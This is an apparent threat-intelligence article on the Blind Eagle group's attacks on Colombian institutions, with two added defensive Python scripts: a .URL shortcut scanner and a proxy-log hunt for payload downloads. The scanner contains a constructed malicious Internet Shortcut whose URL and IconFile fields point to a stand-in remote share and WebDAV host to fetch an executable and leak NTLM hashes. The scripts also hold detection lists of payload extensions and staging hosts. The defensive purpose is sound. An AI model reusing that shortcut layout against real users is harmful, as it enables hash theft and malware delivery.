How Is Blind Eagle Exploiting NTLM Flaws to Attack Colombian Institutions?


Blind Eagle, a threat actor active since at least 2018 and also tracked as AguilaCiega, APT-C-36 and APT-Q-98, is using a Windows NTLM hash-disclosure flaw in attacks on Colombian institutions. The group concentrates on South America, above all Colombia and Ecuador. Its campaigns have been tracked closely since November 2024 and have infected a large number of targets, chiefly Colombian judicial institutions along with other government bodies and private organisations. A single campaign, around December 19, 2024, produced more than 1,600 victims, a measure of how effective the group's operations are.

Attack Methods and Tools Used by Blind Eagle

Blind Eagle relies on spear-phishing email for initial access. The messages carry attachments or links that deliver remote access trojans (RATs) such as AsyncRAT, NjRAT, Quasar RAT and Remcos RAT. The group has also adopted a variant of the technique behind CVE-2024-43451, an NTLMv2 hash-disclosure vulnerability in Microsoft Windows that Microsoft has since patched. The flaw is triggered by a malicious .URL (Internet Shortcut) file: on an unpatched system, minimal interaction with the file, such as a right-click, a delete or a drag, is enough to make Windows authenticate to an attacker-controlled server and hand over the user's NTLMv2 hash. Blind Eagle's variant still works on patched systems. There it no longer leaks the hash, but it still tells the attacker the moment the .URL file has been downloaded and executed, and when the user opens the file it fetches and runs the next-stage payload. The group began using this variant within days of Microsoft's patch, which shows how quickly it adapts to security updates.
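The .URL trick is easy to hunt for on disk and at the mail gateway, because the shortcut has to name the remote host somewhere. The Python scanner below is an added example written for this article, not code from the threat actor or from the research it is based on. It parses the standard Internet Shortcut fields (URL, IconFile, WorkingDirectory) and flags any that point at a remote SMB or WebDAV host, since that is what causes Windows to authenticate outward. The two sample shortcuts, the 203.0.113.7 address and the wording of the findings are constructed for illustration.

```python
"""Flag Internet Shortcut (.URL) files that point Windows at a remote host.

Added example for this article, not the threat actor's or any vendor's code.
The [InternetShortcut] INI format and its URL / IconFile / WorkingDirectory
keys are standard; the regexes, the sample files and the 203.0.113.7 host
are constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse

# \\host\share, //host/share, and the WebDAV forms \\host@80\ and \\host@SSL@443\
UNC_RE = re.compile(r"^(?:\\\\|//)(?P<host>[^\\/@]+)(?:@(?:SSL@)?\d+)?[\\/]")
# Targets that make a "shortcut" a downloader for a payload rather than a link.
EXEC_EXT = (".exe", ".scr", ".dll", ".msi", ".js", ".vbs", ".bat", ".cmd", ".hta", ".lnk")
# Keys Explorer may resolve on its own (icon rendering, context-menu actions)
# without the user ever opening the shortcut.
PASSIVE_KEYS = ("ICONFILE", "WORKINGDIRECTORY")

# Constructed samples: a normal web shortcut and one built like the attack file.
BENIGN_URL = r"""[InternetShortcut]
URL=https://www.example.com/
IconFile=C:\Windows\System32\shell32.dll
IconIndex=13
"""
MALICIOUS_URL = r"""[InternetShortcut]
URL=file://203.0.113.7/share/documento.exe
IconFile=\\203.0.113.7@80\DavWWWRoot\icono.ico
IconIndex=1
"""


@dataclass
class Finding:
    key: str
    value: str
    reason: str


def parse_url_file(text: str) -> dict[str, str]:
    """Parse the INI-style .URL body into {UPPERCASE_KEY: value}."""
    fields: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("[", ";")) or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key.strip().upper()] = value.strip().strip('"')
    return fields


def remote_host(value: str) -> Optional[str]:
    """Return the host a field value would make Windows contact, or None if local."""
    m = UNC_RE.match(value)
    if m:
        return m.group("host").lower()
    parts = urlparse(value)
    if parts.scheme.lower() == "file":
        if parts.hostname:                     # file://host/share/...
            return parts.hostname.lower()
        m = UNC_RE.match(parts.path)           # file:////host/share/...
        return m.group("host").lower() if m else None
    if parts.scheme.lower() in ("http", "https", "ftp") and parts.hostname:
        return parts.hostname.lower()
    return None                                # drive letters, relative paths


def scan_url_file(text: str) -> list[Finding]:
    """Return findings for one .URL body; an empty list means nothing suspicious."""
    fields = parse_url_file(text)
    findings: list[Finding] = []
    for key in PASSIVE_KEYS:
        value = fields.get(key)
        host = remote_host(value) if value else None
        if host:
            findings.append(Finding(key, value,
                f"Explorer may fetch this from {host} on mere interaction, "
                f"authenticating with NTLM over SMB/WebDAV"))
    url = fields.get("URL")
    if url:
        host = remote_host(url)
        is_share = bool(UNC_RE.match(url)) or urlparse(url).scheme.lower() == "file"
        if host and is_share:
            findings.append(Finding("URL", url,
                f"target is a file on a remote share ({host}), not a web page"))
        elif host and urlparse(url).path.lower().endswith(EXEC_EXT):
            findings.append(Finding("URL", url,
                f"target downloads an executable from {host}"))
    return findings


if __name__ == "__main__":
    for name, body in (("benign", BENIGN_URL), ("malicious", MALICIOUS_URL)):
        print(name, [(f.key, f.reason) for f in scan_url_file(body)])
```

Run it over every .URL attachment the gateway sees, or over user profiles and Downloads folders on endpoints; a hit on IconFile or WorkingDirectory is the more telling one, because that fetch happens without the user consciously opening anything.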

Blind Eagle also uses packer-as-a-service (PaaS) offerings such as HeartCrypt to obfuscate its payloads and evade antivirus detection. It now stages those payloads on Bitbucket and GitHub, a shift from its earlier reliance on Google Drive and Dropbox. Hosting malware on legitimate, widely used services means the download traffic comes from domains that proxies and security tools often allow by default, so it draws little attention. Together with the packers, this makes the initial infection harder to catch, and the RATs delivered this way give the group long-term access to the compromised networks.
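Because the downloads come from legitimate domains, blocking the hosts is rarely an option; the useful signal is which clients inside the network pull executable content from code-hosting and file-sharing sites. The Python hunt below is an added example for this article, not part of the original research. It applies that rule to a few constructed proxy-log lines (timestamp, client IP, method, URL, status, bytes). The hostnames, the file extensions, the 10.0.0.0/8 client addresses and the developer allow-list are assumptions made for illustration.

```python
"""Hunt proxy logs for payload downloads from code-hosting / file-sharing sites.

Added example for this article. The log format, the hostnames, the client
addresses and the allow-list are constructed assumptions, not real data.
"""
from __future__ import annotations

from collections import Counter
from urllib.parse import parse_qs, urlparse

# Services the article names as Blind Eagle staging locations. The concrete
# hostnames are an assumption about how each service serves raw files.
STAGING_HOSTS = {
    "github.com", "raw.githubusercontent.com", "objects.githubusercontent.com",
    "bitbucket.org",
    "drive.google.com", "drive.usercontent.google.com",
    "www.dropbox.com", "dl.dropboxusercontent.com",
}
# Extensions ordinary users should rarely pull from these sites.
PAYLOAD_EXT = (".exe", ".dll", ".scr", ".msi", ".bat", ".cmd", ".vbs", ".js",
               ".hta", ".lnk", ".url", ".zip", ".rar", ".7z", ".iso", ".img")
# Developer workstations for which archive downloads from GitHub are expected.
DEV_ALLOWLIST = {"10.0.5.20"}

# Constructed log lines: "<ts> <client> <method> <url> <status> <bytes>".
SAMPLE_LOG = """\
2024-12-19T14:02:11Z 10.0.7.44 GET https://raw.githubusercontent.com/example-org/notificacion/main/Demanda_Judicial.exe 200 418304
2024-12-19T14:02:13Z 10.0.7.44 GET https://bitbucket.org/example-ws/docs/downloads/Citacion.zip 200 92311
2024-12-19T14:05:40Z 10.0.5.20 GET https://github.com/psf/requests/archive/refs/heads/main.zip 200 170021
2024-12-19T14:06:02Z 10.0.7.51 GET https://github.com/example-org/notificacion 200 51200
2024-12-19T14:07:15Z 10.0.7.51 GET https://drive.usercontent.google.com/download?id=abc123&export=download 200 404112
2024-12-19T14:08:30Z 10.0.7.60 GET https://www.example.com/index.html 200 1024
"""


def looks_like_download(url: str) -> bool:
    """True when the URL fetches a file rather than a repository or web page."""
    parts = urlparse(url)
    if parts.path.lower().endswith(PAYLOAD_EXT):
        return True
    # Google Drive direct downloads carry no extension; they use export=download.
    return "download" in parse_qs(parts.query).get("export", [])


def hunt(log_text: str, allowlist: set[str] = DEV_ALLOWLIST) -> list[dict]:
    """Return one hit per successful payload download from a staging host."""
    hits: list[dict] = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue            # malformed line; a real pipeline would count these
        ts, client, method, url, status, size = fields
        host = (urlparse(url).hostname or "").lower()
        if client in allowlist or host not in STAGING_HOSTS or status != "200":
            continue
        if looks_like_download(url):
            hits.append({"ts": ts, "client": client, "host": host,
                         "url": url, "bytes": int(size)})
    return hits


def clients_by_hits(hits: list[dict]) -> Counter:
    """Rank clients by number of suspicious downloads, for triage ordering."""
    return Counter(h["client"] for h in hits)


if __name__ == "__main__":
    for h in hunt(SAMPLE_LOG):
        print(h["ts"], h["client"], h["host"], h["bytes"], h["url"])
    print(clients_by_hits(hunt(SAMPLE_LOG)).most_common())
```

The allow-list is what keeps this usable: developer machines legitimately download archives from GitHub all day, while a workstation in a court registry fetching an .exe from raw.githubusercontent.com deserves a look every time.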

Data Compromise and Operational Insights

How much Blind Eagle harvests from its victims became clear from analysis of a GitHub repository the group used during its campaigns. The repository said a good deal about the operators: clues such as the times at which it was updated align the group's activity with the UTC-5 time zone, which is Colombia's. It also held stolen data, including account-password pairs for 1,634 unique email addresses, usernames, email credentials and even ATM PINs, much of it tied to Colombian entities, which shows how broad the compromise was.

Operational slip-ups of this kind are rare, and this one exposed a good deal about how the group works. Delivering malware from legitimate file-sharing and code-hosting platforms (Google Drive, Dropbox, Bitbucket, GitHub) lets Blind Eagle blend into everyday network traffic and stay unnoticed for long periods. Its use of crimeware bought on the underground market, including Remcos RAT, HeartCrypt and PureCrypter, points to established connections in the cybercriminal ecosystem, which supply the group with current evasion techniques and reliable long-term access to the networks it compromises.

Strategic Implications and Future Considerations

The campaigns since November 2024 show a group that adapts quickly: it picked up a variant of the CVE-2024-43451 .URL technique within days of the patch, moved its payload hosting from Google Drive and Dropbox to Bitbucket and GitHub, and buys its packers and RATs from the crimeware market rather than building them. For Colombian judicial, government and private organisations the practical consequences are a high infection rate, credential theft on the scale of the 1,634 exposed email accounts, and a persistent foothold for the attacker. Authorities in the region continue to work against the group, but the impact of these attacks shows that defences need to improve: harden NTLM and block outbound SMB and WebDAV at the perimeter, filter .URL attachments at the mail gateway, and watch for executable content being downloaded from trusted hosting services.
